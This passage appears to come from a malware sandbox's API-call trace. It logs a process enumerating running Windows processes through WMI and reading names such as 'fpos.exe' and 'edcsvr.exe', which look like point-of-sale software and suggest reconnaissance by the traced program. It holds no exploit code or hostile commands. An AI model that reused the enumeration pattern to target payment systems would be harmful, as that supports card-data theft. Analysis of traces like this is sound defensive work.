pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.887] IWbemClassObject:Get (in: This=0x5636470, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269c2a0*=0, plFlavor=0x269c2a4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fpos.exe", varVal2=0x0), pType=0x269c2a0*=8, plFlavor=0x269c2a4*=0) returned 0x0 [0214.887] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0214.887] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0214.887] IWbemClassObject:Get (in: This=0x5636470, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269c2a0*=8, plFlavor=0x269c2a4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fpos.exe", varVal2=0x0), pType=0x269c2a0*=8, plFlavor=0x269c2a4*=0) returned 0x0 [0214.887] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0214.887] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0214.887] CoTaskMemAlloc (cb=0x4) returned 0x56323a8 [0214.887] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56323a8, puReturned=0x267acc0 | out: apObjects=0x56323a8*=0x5636608, puReturned=0x267acc0*=0x1) returned 0x0 [0214.888] IUnknown:QueryInterface (in: This=0x5636608, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5636608) returned 0x0 [0214.888] IUnknown:QueryInterface (in: This=0x5636608, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.888] IUnknown:QueryInterface (in: This=0x5636608, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.888] IUnknown:AddRef (This=0x5636608) returned 0x3 [0214.888] IUnknown:QueryInterface (in: This=0x5636608, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.888] IUnknown:QueryInterface (in: This=0x5636608, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.888] IUnknown:QueryInterface (in: This=0x5636608, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x563660c) returned 0x0 [0214.888] IMarshal:GetUnmarshalClass (in: This=0x563660c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.888] IUnknown:Release (This=0x563660c) returned 0x3 [0214.889] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.889] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.889] IUnknown:QueryInterface (in: This=0x5636608, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.889] IUnknown:Release (This=0x5636608) returned 0x2 [0214.889] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.889] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.889] IUnknown:QueryInterface (in: This=0x5636608, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5636608) returned 0x0 [0214.889] IUnknown:AddRef (This=0x5636608) returned 0x4 [0214.889] IUnknown:Release (This=0x5636608) returned 0x3 [0214.889] IUnknown:Release (This=0x5636608) returned 0x2 [0214.889] CoTaskMemFree (pv=0x56323a8) [0214.889] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.889] IUnknown:AddRef (This=0x5636608) returned 0x3 [0214.889] IWbemClassObject:Get (in: This=0x5636608, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.890] IWbemClassObject:Get (in: This=0x5636608, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2780\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.890] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2780\"") returned 0x66 [0214.890] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2780\"") returned 0x66 [0214.890] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.890] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.890] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.890] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.891] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56323a8) returned 0x0 [0214.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x56323a8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.891] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56323a8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5638440) returned 0x0 [0214.891] WbemDefPath:IUnknown:Release (This=0x56323a8) returned 0x0 [0214.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638440, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5638440) returned 0x0 [0214.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638440, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.892] WbemDefPath:IUnknown:AddRef (This=0x5638440) returned 0x3 [0214.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638440, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638440, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638440, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56323b8) returned 0x0 [0214.892] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56323b8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.892] WbemDefPath:IUnknown:Release (This=0x56323b8) returned 0x3 [0214.892] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.892] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638440, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.892] WbemDefPath:IUnknown:Release (This=0x5638440) returned 0x2 [0214.892] WbemDefPath:IUnknown:Release (This=0x5638440) returned 0x1 [0214.892] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.892] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638440, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5638440) returned 0x0 [0214.892] WbemDefPath:IUnknown:AddRef (This=0x5638440) returned 0x3 [0214.892] WbemDefPath:IUnknown:Release (This=0x5638440) returned 0x2 [0214.892] WbemDefPath:IWbemPath:SetText (This=0x5638440, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2780\"") returned 0x0 [0214.892] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.893] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.893] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.893] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.893] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.893] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.893] IWbemClassObject:Get (in: This=0x5636608, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269cb10*=0, plFlavor=0x269cb14*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="edcsvr.exe", varVal2=0x0), pType=0x269cb10*=8, plFlavor=0x269cb14*=0) returned 0x0 [0214.893] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0214.893] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0214.893] IWbemClassObject:Get (in: This=0x5636608, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269cb10*=8, plFlavor=0x269cb14*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="edcsvr.exe", varVal2=0x0), pType=0x269cb10*=8, plFlavor=0x269cb14*=0) returned 0x0 [0214.893] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0214.893] SysStringByteLen (bstr="edcsvr.exe") returned 0x14 [0214.893] CoTaskMemAlloc (cb=0x4) returned 0x56323e8 [0214.893] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56323e8, puReturned=0x267acc0 | out: apObjects=0x56323e8*=0x56367a0, puReturned=0x267acc0*=0x1) returned 0x0 [0214.894] IUnknown:QueryInterface (in: This=0x56367a0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x56367a0) returned 0x0 [0214.894] IUnknown:QueryInterface (in: This=0x56367a0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.894] IUnknown:QueryInterface (in: This=0x56367a0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.895] IUnknown:AddRef (This=0x56367a0) returned 0x3 [0214.895] IUnknown:QueryInterface (in: This=0x56367a0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.895] IUnknown:QueryInterface (in: This=0x56367a0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.895] IUnknown:QueryInterface (in: This=0x56367a0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x56367a4) returned 0x0 [0214.895] IMarshal:GetUnmarshalClass (in: This=0x56367a4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.895] IUnknown:Release (This=0x56367a4) returned 0x3 [0214.895] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.895] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.895] IUnknown:QueryInterface (in: This=0x56367a0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.895] IUnknown:Release (This=0x56367a0) returned 0x2 [0214.895] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.895] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.895] IUnknown:QueryInterface (in: This=0x56367a0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x56367a0) returned 0x0 [0214.895] IUnknown:AddRef (This=0x56367a0) returned 0x4 [0214.895] IUnknown:Release (This=0x56367a0) returned 0x3 [0214.895] IUnknown:Release (This=0x56367a0) returned 0x2 [0214.895] CoTaskMemFree (pv=0x56323e8) [0214.896] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.896] IUnknown:AddRef (This=0x56367a0) returned 0x3 [0214.896] IWbemClassObject:Get (in: This=0x56367a0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.896] IWbemClassObject:Get (in: This=0x56367a0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2788\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.896] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2788\"") returned 0x66 [0214.896] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2788\"") returned 0x66 [0214.896] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.896] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.896] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.896] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.897] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56323e8) returned 0x0 [0214.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x56323e8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.897] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56323e8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5638520) returned 0x0 [0214.897] WbemDefPath:IUnknown:Release (This=0x56323e8) returned 0x0 [0214.898] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638520, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5638520) returned 0x0 [0214.898] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638520, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.898] WbemDefPath:IUnknown:AddRef (This=0x5638520) returned 0x3 [0214.898] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638520, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.898] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638520, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.898] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638520, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56323f8) returned 0x0 [0214.898] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56323f8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.898] WbemDefPath:IUnknown:Release (This=0x56323f8) returned 0x3 [0214.898] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.898] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.898] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638520, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.898] WbemDefPath:IUnknown:Release (This=0x5638520) returned 0x2 [0214.898] WbemDefPath:IUnknown:Release (This=0x5638520) returned 0x1 [0214.898] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.898] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.898] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638520, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5638520) returned 0x0 [0214.899] WbemDefPath:IUnknown:AddRef (This=0x5638520) returned 0x3 [0214.899] WbemDefPath:IUnknown:Release (This=0x5638520) returned 0x2 [0214.899] WbemDefPath:IWbemPath:SetText (This=0x5638520, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2788\"") returned 0x0 [0214.899] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.899] WbemDefPath:IWbemPath:GetText (in: 